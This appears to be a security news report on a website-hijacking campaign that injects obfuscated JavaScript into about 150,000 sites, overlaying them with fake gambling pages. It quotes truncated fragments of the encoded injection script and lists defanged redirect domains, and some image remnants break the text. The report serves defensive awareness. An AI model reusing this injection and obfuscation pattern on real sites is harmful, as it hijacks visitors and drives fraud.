A massive website hijacking campaign has been uncovered, affecting approximately 150,000 websites with malicious full-page redirects to Chinese gambling platforms.
The attack, which first emerged in February 2025 targeting around 35,000 sites, has rapidly expanded its reach, demonstrating the threat actors’ growing sophistication and operational scale.
The compromise involves inserting malicious code that creates a full-screen overlay in visitors’ browsers, effectively replacing legitimate website content with gambling advertisements.
.png
)
These injections impersonate known betting platforms, including Bet365, and incorporate official logos to enhance their credibility and conversion rates.
.webp)
CSIDE researchers identified that the attack primarily targets Chinese-speaking users in China, Hong Kong, and the United States, with many of the malicious destinations selectively blocking traffic from specific regions.
The threat actors have implemented multiple redirection URLs, including 551007t[.]cc, t399229[.]com, and W88in[.]com, among others.
Infection chain
The infection relies on sophisticated obfuscation techniques to evade detection by security tools.
The injected script uses HTML entity encoding to mask its malicious nature, as exemplified in the following code snippet:-
<script type="text/javascript" charset="utf-8" rel="nofollow" src="/@pWhen decoded, this obfuscated script reveals its true functionality, which includes self-decryption mechanisms that ultimately inject a reference to an external JavaScript file:-
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](
'\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x
);The final payload contains sophisticated logic that checks for gambling-related keywords in the page title before creating a div element with CSS positioning that ensures the overlay covers the entire viewport.
It also enforces mobile-friendly viewing parameters through viewport tag manipulation to maximize effectiveness across all devices.
This campaign represents a significant threat to website integrity and user security, highlighting the need for enhanced website monitoring and security practices.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
